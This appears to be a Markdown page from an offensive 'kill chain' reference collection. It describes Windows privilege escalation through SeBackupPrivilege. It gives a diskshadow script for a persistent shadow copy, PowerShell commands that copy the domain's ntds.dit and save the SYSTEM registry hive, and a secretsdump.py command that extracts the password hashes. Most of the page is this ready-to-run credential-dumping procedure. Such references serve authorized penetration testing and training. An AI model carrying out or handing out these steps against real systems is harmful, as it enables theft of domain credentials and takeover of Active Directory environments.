killchain-compendium/post_exploitation/docs/windows/sebackupprivilege.md

30 lines
1.1 KiB
Markdown

# SEBackupPrivilege Escalation
* Check user privileges to escalate
## Usage
* Check `whoami /all`
* `SeBackupPrivilege` must be present
* [Payloads all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#using-diskshadow-a-windows-signed-binary)
* Upload `diskshadow.txt` to the target with the following content, there has to be a space at the end of each line!!!!
```sh
set metadata C:\tmp\tmp.cabs
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% h:
```
* Change dir to `C:\Windows\System32` and `diskshadow.exe /s C:\tmp\diskshadow.txt`
* Upload these [dlls](https://github.com/giuliano108/SeBackupPrivilege) to the target
```sh
import-module .\SeBackupPrivilegeUtils.dll
import-module .\SeBackupPrivilegeCmdLets.dll
copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite
reg save HKLM\SYSTEM C:\tmp\system
```
* Downloads the files `ntds.dit` and `system`
* Extract the hashes via
```sh
secretsdump.py -system system -ntds ntds.dit LOCAL > out.txt
```